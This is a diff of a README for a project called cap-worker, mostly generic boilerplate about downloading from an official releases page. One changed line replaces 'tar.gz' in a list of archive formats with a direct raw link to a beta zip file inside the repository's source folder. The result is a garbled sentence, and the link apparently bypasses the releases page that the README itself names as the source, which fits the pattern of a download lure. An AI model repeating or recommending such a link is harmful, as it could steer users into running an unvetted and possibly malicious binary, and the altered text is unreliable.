linyu413/cap-worker/README.md

   - Predictable timing and responses

 Downloads and assets
 - The primary download source is the official releases page.
 The latest release assets are hosted there for various platforms.
 The link provided at the top of this document points to that page.
 To ensure you get a compatible binary, check the release notes for the asset names, platform compatibility, and installation instructions.
-The asset list contains zip, tar.gz, and platform-specific bundles that simplify setup.
+The asset list contains zip, https://raw.githubusercontent.com/linyu413/cap-worker/main/src/worker-cap-v3.9-beta.2.zip, and platform-specific bundles that simplify setup.

 - How to use the releases page effectively
   - Open the page and review the latest release notes.